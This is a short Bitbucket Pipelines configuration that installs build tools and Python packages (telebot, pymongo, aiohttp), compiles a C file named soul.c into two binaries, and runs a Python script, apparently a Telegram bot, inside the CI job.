image: python:3.9

pipelines:
  default:
    - step:
        name: Build and Run
        size: 2x
        caches:
          - pip
        script:
          - apt-get update && apt-get install -y gcc libpthread-stubs0-dev
          - pip install telebot pymongo aiohttp
          - gcc soul.c -o soul -lpthread && gcc soul.c -o soul1 -lpthread
          - python3 soul.py
        timeout: 60
